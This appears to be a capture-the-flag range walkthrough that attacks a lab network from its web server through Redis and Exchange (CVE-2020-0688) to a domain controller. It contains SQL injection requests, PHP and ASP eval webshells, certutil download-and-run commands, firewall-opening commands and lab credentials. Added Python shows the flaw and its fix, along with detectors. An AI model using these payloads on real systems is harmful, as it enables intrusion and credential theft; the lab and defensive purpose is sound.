From external foothold to internal domain: the cncat range
forg12

Range description

Range topology

cncat网络拓扑图.drawio

PS: range author: 暗月

HOSTS setup

cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
# 5-fbi
192.168.0.206 www.cocat.cc

image-20240119134618443

Web server

Information gathering

Port scan

sudo nmap -sT -sV -O 192.168.0.206 -p-
Starting Nmap 7.93 ( https://nmap.org )
Nmap scan report for www.cocat.cc (192.168.0.206)
Host is up (0.0025s latency).
Not shown: 65529 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
21/tcp open ftp FileZilla ftpd
80/tcp open http Apache httpd 2.4.46 ((Win32) OpenSSL/1.1.1g mod_fcgid/2.3.9a)
888/tcp open http Apache httpd 2.4.46 ((Win32) OpenSSL/1.1.1g mod_fcgid/2.3.9a)
3306/tcp open mysql MySQL (unauthorized)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
8888/tcp open http Ajenti http control panel
MAC Address: 00:0C:29:DF:81:FA (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Microsoft Windows 2012
OS CPE: cpe:/o:microsoft:windows_server_2012:r2
OS details: Microsoft Windows Server 2012 or Windows Server 2012 R2
Network Distance: 1 hop
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 172.78 seconds

Directory brute force

dirsearch -u "http://www.cocat.cc" -e php,htm,js,bak,zip,tar.gz,tgz,txt -r -R 1 -i 200-399

_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )

Extensions: php, htm, js, bak, zip, tar.gz, tgz, txt | HTTP method: GET | Threads: 30 | Wordlist size: 12472

Output File: /home/kali/.dirsearch/reports/www.cocat.cc.txt

Error Log: /home/kali/.dirsearch/logs/errors.log

Target: http://www.cocat.cc/

[00:08:31] Starting:
[00:08:38] 200 - 78B - /Desktop.ini
[00:09:09] 200 - 1KB - /favicon.ico
[00:09:12] 302 - 0B - /index.php -> ./kss_admin/index.php
[00:09:12] 302 - 0B - /index.php. -> ./kss_admin/index.php
[00:09:12] 302 - 0B - /index.php/login/ -> ./kss_admin/index.php
[00:09:12] 302 - 0B - /index.pHp -> ./kss_admin/index.php
[00:09:47] 200 - 2MB - /web.zip

Task Completed

Vulnerability testing

The directory scan turned up the packed source (web.zip). After decrypting the encoded PHP and auditing it, a SQL injection was found in the v_oid parameter of /kss_inc/payapi_return2.php (the payment callback). The request below marks the injection point with `*` for sqlmap:

image-20240119134630760

POST /kss_inc/payapi_return2.php HTTP/1.1
Host: www.cocat.cc
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: ZDEDebuggerPresent=php,phtml,php3; loginimg=BkoEA1odDF4%3D; loginimg_ver=364892bbc0c1067100dc8dc53ba2b1b0
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 65

v_oid=1*&v_pstatus=1&v_amount=1&v_moneytype=1&remark1=1&v_md5str=1
sqlmap -r sqli.txt --batch

image-20240119134647198

sqlmap -u "www.ddd4.com/search/?keyword=123*" --batch --tamper=chardoubleencode -D www_ddd4_com -T doc_user --dump

image-20240119134800192

Log in to the admin backend with the credentials dumped from the database and insert a one-line webshell:

');eval($_POST['abc']);//

image-20240119134818242

The input field caps the length, so submit the request through Burp instead.

image-20240119134828512

image-20240119134837283
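
How that payload works, as an added example that is not code from the range or its CMS: the admin settings are written back into a PHP config file, and when the writer interpolates a value straight into a single-quoted literal, the leading `');` closes both the literal and the surrounding call, `eval(...)` becomes a statement of its own, and `//` comments out whatever followed on that line. The `define('KEY','value');` template below is an assumption about the target's config format; the escaping function is the fix, and the parser shows that the hardened file round-trips the payload as plain data.

```python
import re

# Constructed payload, identical to the one entered in the admin panel above.
PAYLOAD = "');eval($_POST['abc']);//"

# Assumed template for the generated config file (not the CMS's real writer):
# one  define('KEY','value');  line per setting.
DEFINE_RE = re.compile(r"define\('((?:[^'\\]|\\.)*)','((?:[^'\\]|\\.)*)'\);")


def write_config_vulnerable(settings):
    """Interpolates admin input straight into PHP source: one quote ends the literal."""
    lines = ["<?php"]
    for key, value in settings.items():
        lines.append(f"define('{key}','{value}');")
    return "\n".join(lines) + "\n"


def php_single_quoted(value):
    """Encode a string as a PHP single-quoted literal (the rules var_export() uses):
    only backslash and the quote itself need escaping."""
    return "'" + value.replace("\\", "\\\\").replace("'", "\\'") + "'"


def write_config_safe(settings):
    """Same file, but every value goes through the literal encoder and keys are whitelisted."""
    lines = ["<?php"]
    for key, value in settings.items():
        if not re.fullmatch(r"[A-Za-z_][A-Za-z0-9_]*", key):
            raise ValueError(f"refusing config key {key!r}")
        lines.append(f"define({php_single_quoted(key)},{php_single_quoted(value)});")
    return "\n".join(lines) + "\n"


def parse_config(php_source):
    """Read the settings back, undoing the single-quote escaping."""
    def unescape(s):
        return re.sub(r"\\(['\\])", r"\1", s)
    return {unescape(k): unescape(v) for k, v in DEFINE_RE.findall(php_source)}


def has_injected_code(php_source):
    """True if any generated line is not exactly one define(...); statement,
    i.e. the admin input broke out of its literal."""
    body = php_source.splitlines()[1:]
    return any(DEFINE_RE.fullmatch(line) is None for line in body)


if __name__ == "__main__":
    print(write_config_vulnerable({"SITE_NAME": PAYLOAD}))
    print(write_config_safe({"SITE_NAME": PAYLOAD}))
```

In the vulnerable output the setting itself is lost (the parser reads it back as an empty string) and the rest of the line is live PHP; in the safe output the same bytes come back as the original string. The length cap the author hit in the form is not a control here: the fix is the encoder, not the input size.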

BT panel (宝塔) privilege escalation

image-20240119134844361

image-20240119134851304

set /p port=<%panel_path%\data\port.pl             # 8888      (panel port)
set /p password=<%panel_path%\data\default.pl      # jSKyFFdj  (panel password)
set /p admin_path=<%panel_path%\data\admin_path.pl # /e1VOsmtO (login path)
C:/BtSoft/panel/data/default.db                    # gOXZQjWA  (username)

The panel port, password and login path come from those three files; the username is stored in the SQLite database C:/BtSoft/panel/data/default.db. The panel is the 8888 service nmap fingerprinted as Ajenti.

image-20240119134914335

Upload a Cobalt Strike payload and run it:

image-20240119134923178

image-20240119134931828

Flag1

C:\Users\Administrator\root.txt

image-20240119134941049

Redis server

Information gathering

beacon> shell fscan -h 10.10.11.133
[*] Tasked beacon to run: fscan -h 10.10.11.133
[+] host called home, sent: 52 bytes
[+] received output:

___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.0
start infoscan
10.10.11.133:6379 open
10.10.11.133:80 open
[*] alive ports len is: 2
start vulscan
[*] WebTitle http://10.10.11.133 code:200 len:701 title:IIS Windows Server

Redis brute force

Directory brute-forcing the IIS site returned nothing, so brute-force the Redis password instead (through proxychains over the SOCKS pivot):

sudo proxychains hydra redis://10.10.11.133 -P somd5top10w.txt
[sudo] password for kali:
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-01-18 04:20:16
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 100000 login tries (l:1/p:100000), ~6250 tries per task
[DATA] attacking redis://10.10.11.133:6379/
[proxychains] Strict chain ... 192.168.0.12:24791 ... 10.10.11.133:6379 ... OK
[proxychains] Strict chain ... 192.168.0.12:24791 ... (repeated for each hydra task)
[6379][redis] host: 10.10.11.133 password: 123456789qq
[STATUS] attack finished for 10.10.11.133 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished

Write a webshell into the default IIS web root by pointing the RDB dump at it (CONFIG SET dir / dbfilename, then SAVE):

proxychains redis-cli -h 10.10.11.133
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] Strict chain ... 192.168.0.12:24791 ... 10.10.11.133:6379 ... OK
10.10.11.133:6379> auth 123456789qq
OK
10.10.11.133:6379> CONFIG SET dir C:\inetpub\wwwroot
OK
10.10.11.133:6379> CONFIG SET dbfilename a.asp
OK
10.10.11.133:6379> set x ' <%eval request("abc")%> '
OK
10.10.11.133:6379> save
OK

image-20240119135005216
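
The redis-cli session above, as an added example (not from the range write-up): the first function emits the exact RESP frames redis-cli sends for AUTH / CONFIG SET / SET / SAVE, which is what you would see on the wire or in a capture; the second is the defender-side check, because the technique leaves a Redis RDB file (magic bytes `REDIS` followed by a four-digit version) sitting in the web root. The demo directory and the stand-in dump contents are constructed and are not a real RDB file.

```python
import os
import tempfile


def resp_command(*args):
    """Encode one command as a RESP array of bulk strings (what redis-cli sends)."""
    out = [f"*{len(args)}\r\n".encode()]
    for a in args:
        b = a.encode()
        out.append(f"${len(b)}\r\n".encode() + b + b"\r\n")
    return b"".join(out)


def webroot_write_sequence(password, webroot, filename, shell):
    """The byte stream for the session above: AUTH, CONFIG SET dir,
    CONFIG SET dbfilename, SET x <shell>, SAVE.  Bulk strings are binary-safe,
    so the Windows path and the <% %> tag need no quoting."""
    return b"".join([
        resp_command("AUTH", password),
        resp_command("CONFIG", "SET", "dir", webroot),
        resp_command("CONFIG", "SET", "dbfilename", filename),
        resp_command("SET", "x", shell),
        resp_command("SAVE"),
    ])


RDB_MAGIC = b"REDIS"  # every RDB dump starts with "REDIS" + 4-digit version, e.g. REDIS0009


def find_rdb_dumps(webroot):
    """Return files under webroot whose first bytes are the RDB header.
    A web server has no business serving Redis dumps; one appearing here is the
    footprint of CONFIG SET dir/dbfilename + SAVE, whatever extension it was given."""
    hits = []
    for dirpath, _, files in os.walk(webroot):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as f:
                    head = f.read(9)
            except OSError:
                continue
            if head.startswith(RDB_MAGIC) and head[5:9].isdigit():
                hits.append(path)
    return sorted(hits)


def demo():
    """Build a fake web root with one planted dump and one benign page."""
    root = tempfile.mkdtemp()
    with open(os.path.join(root, "a.asp"), "wb") as f:
        # Constructed stand-in: RDB header, then the key/value roughly as it lands
        # in a dump, with the ASP tag intact.  Not a valid RDB file.
        f.write(b"REDIS0009\xfa\tredis-ver\x055.0.7\x00\x01x <%eval request(\"abc\")%> \xff")
    with open(os.path.join(root, "index.html"), "wb") as f:
        f.write(b"<html>IIS Windows Server</html>")
    return {"root": root, "dumps": find_rdb_dumps(root)}


if __name__ == "__main__":
    print(webroot_write_sequence("123456789qq", r"C:\inetpub\wwwroot", "a.asp",
                                 ' <%eval request("abc")%> '))
    print(demo())
```

SAVE writes the whole keyspace, so the shell ends up surrounded by binary; IIS still finds and executes the `<% %>` block in a .asp file, which is why the trick works, but the same header gives the defender a clean signature. The fixes are the usual ones: `requirepass` with a real secret, `bind` to the loopback or internal interface, and `rename-command CONFIG ""` so a leaked password cannot redirect the dump.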

Uploading through AntSword returned a 500 error, so stage the payload on the web server (10.10.11.132) and fetch it with certutil from the webshell; then allow the listener port through the firewall and run it to bring the host online:

certutil -urlcache -split -f http://10.10.11.132/sencond.exe

shell netsh advfirewall firewall add rule name=open4431 protocol=TCP localport=4431 dir=in action=allow

SpoolSystem injection

image-20240119135022332

image-20240119135029569

Dumping plaintext credentials

image-20240119135036862

image-20240119135106861

1
shell netsh advfirewall firewall add rule name=open4413 protocol=TCP localport=4413 dir=in action=allow

image-20240119135127482

Flag2

image-20240119135136166

Exchange server

Information gathering

fscan results: 10.10.12.209 serves Outlook Web App.

image-20240119135153548

Search the compromised host for local Outlook data files:

image-20240119135201153

Once retrieved and opened, the file contains the account credentials.

image-20240119135209546

Log in with the account:

image-20240119135218924

Exchange CVE-2020-0688

CVE-2020-0688-EXP

Ysoserial.exe

proxychains python3 cve-2020-0688.py -s https://10.10.12.209/owa/ -u 'cncat\moonsec' -p 'QQqq5201314' -c "cmd /c certutil -urlcache -split -f http://10.10.12.130/third.exe c:/third.exe"

image-20240119135228245

image-20240119135236525

proxychains python3 cve-2020-0688.py -s https://10.10.12.209/owa/ -u 'cncat\moonsec' -p 'QQqq5201314' -c "cmd /c  c:/third.exe"

image

image-20240119135310215

image-20240119135318295
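
The detection side of the step above, as an added example rather than anything from the write-up or the exploit repository: CVE-2020-0688 exists because every Exchange install shipped the same static `machineKey` for the /ecp application, so anyone holding a valid mailbox login (here cncat\moonsec) can sign a __VIEWSTATE that carries a ysoserial gadget. The exploit sends it on the query string of /ecp/default.aspx together with __VIEWSTATEGENERATOR, which normal browser traffic never does, so the IIS W3C log alone is enough to spot it and to name the account that was used. The log lines are constructed, the `#Fields` layout is the IIS default, and `B97B4E27` is the generator value public exploits use for that page.

```python
from urllib.parse import parse_qs

# Constructed IIS W3C log excerpt (not from the range); the ViewState payload is truncated.
SAMPLE_LOG = r"""#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs-Referer sc-status sc-substatus sc-win32-status time-taken
2024-01-19 05:31:02 10.10.12.209 GET /owa/auth/logon.aspx url=https://10.10.12.209/owa/ 443 - 10.10.12.130 Mozilla/5.0 - 200 0 0 31
2024-01-19 05:31:40 10.10.12.209 GET /ecp/default.aspx __VIEWSTATEGENERATOR=B97B4E27&__VIEWSTATE=%2FwEy...truncated 443 cncat\moonsec 10.10.12.130 python-requests/2.31.0 - 500 0 0 187
2024-01-19 05:32:01 10.10.12.209 GET /ecp/default.aspx - 443 cncat\moonsec 10.10.12.130 Mozilla/5.0 - 200 0 0 12
"""


def parse_iis_log(text):
    """Turn W3C extended log lines into dicts keyed by the names in the #Fields header.
    IIS never emits spaces inside a field (they become '+'), so a plain split is safe."""
    fields = None
    rows = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if line.startswith("#") or not line.strip():
            continue
        values = line.split(" ")
        if fields and len(values) == len(fields):
            rows.append(dict(zip(fields, values)))
    return rows


def is_cve_2020_0688_attempt(row):
    """ECP does not take ViewState on the query string for a normal page load;
    the exploit puts the serialized payload there next to the generator."""
    stem = row.get("cs-uri-stem", "").lower()
    query = row.get("cs-uri-query", "")
    if not stem.endswith("/ecp/default.aspx") or query == "-":
        return False
    params = {k.lower() for k in parse_qs(query, keep_blank_values=True)}
    return "__viewstate" in params and "__viewstategenerator" in params


def find_attempts(text):
    """Return the offending rows; cs-username is the mailbox account the attacker
    authenticated with, c-ip where the request came from."""
    return [r for r in parse_iis_log(text) if is_cve_2020_0688_attempt(r)]


if __name__ == "__main__":
    for hit in find_attempts(SAMPLE_LOG):
        print(hit["date"], hit["time"], hit["cs-username"], hit["c-ip"], hit["sc-status"])
```

The third line shows why the match must require the ViewState parameters and not just the path: the same user hitting /ecp/default.aspx with no query string is ordinary ECP use. The 500 on the matching line is the server choking after the deserialization has already run, so status alone is not a safe filter either.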

Flag3

image-20240119135325527

Domain controller

Information gathering

Dump plaintext credentials

image-20240119135332595

Lateral movement

With the domain controller's hash in hand, move laterally with PsExec:

image-20240119135342308

image-20240119135351163

image-20240119135358606

Flag4

image-20240119135406096